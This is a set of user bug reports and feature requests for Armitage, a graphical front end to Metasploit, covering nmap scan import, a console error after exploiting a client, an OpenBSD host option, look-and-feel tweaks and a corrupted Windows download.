Revision: 11229
Node Kind: directory
Schedule: normal
Last Changed Author: scriptjunkie
Last Changed Rev: 11229
Last Changed Date: 2010-12-05 14:06:28 -0600 (Sun, 05 Dec 2010)

$ uname -a
Linux zuul 2.6.35-23-generic #41-Ubuntu SMP Wed Nov 24 11:55:36 UTC 2010 x86_64 
GNU/Linux

Ubuntu 10.10 64 bit

Which database are you using?

$ mysql --version
mysql  Ver 14.14 Distrib 5.1.49, for debian-linux-gnu (x86_64) using readline 
6.1

1. If I had a million dollars to pay you (that's what it'd cost if you
weren't so nice), I'd like you to add...

you spoke on hack5 about importing scans from nmap into the database I have no 
clue how to do this.

It would be really awsom if you could take the xml from nmap import it into 
armitage with your normal file explorer and let armitage do the database stuf 

this way you have best of both worlds in that the user can use nmap and see the 
progress of their scan but yet be abble to use armitage without having to run 
the scan a 2nd time within it as that is what I do at the moment.

Lewis McMahon [email protected]

ps really enjoyed you on hack5 was a great episode and realy enjoying armatage

What steps will reproduce the problem?
1. exploit a client
2. try tunning the console and run some command!
3. Error!

What is the expected output? What do you see instead?
I expect it to run the command in the windows console! instead i get an error...


What version of Metasploit are you using (type: svn info)? On which
operating system?
The download on the newest metasploit (Svn:1165) using the download of armitage 
from fastandeasyhacking.com for windows!


Which database are you using?
the second one, postgresql



Please provide any additional information below.
error message: Invalid source file specified: C:framework1msf3command.txt

1. If I had a million dollars to pay you (that's what it'd cost if you
weren't so nice), I'd like you to add...
An option for OpenBSD under host.


2. Because this feature doesn't exist I have to...
Use some other option like NetBSD.


3. If you add this feature I will...
Use it all the time?

This is probably a quick and easy edit to your main java class.  


Here's their howto: 
http://download.oracle.com/javase/tutorial/uiswing/lookandfeel/plaf.html

This would make Armitage look prettier.  That's it.  But I'd appreciate it! :)

What steps will reproduce the problem?
1.download the zip file for windows
2.attempt to extract it 


What is the expected output? What do you see instead?

corrupted zip file


What version of Metasploit are you using (type: svn info)? On which
operating system?
xp


Which database are you using?

local


Please provide any additional information below.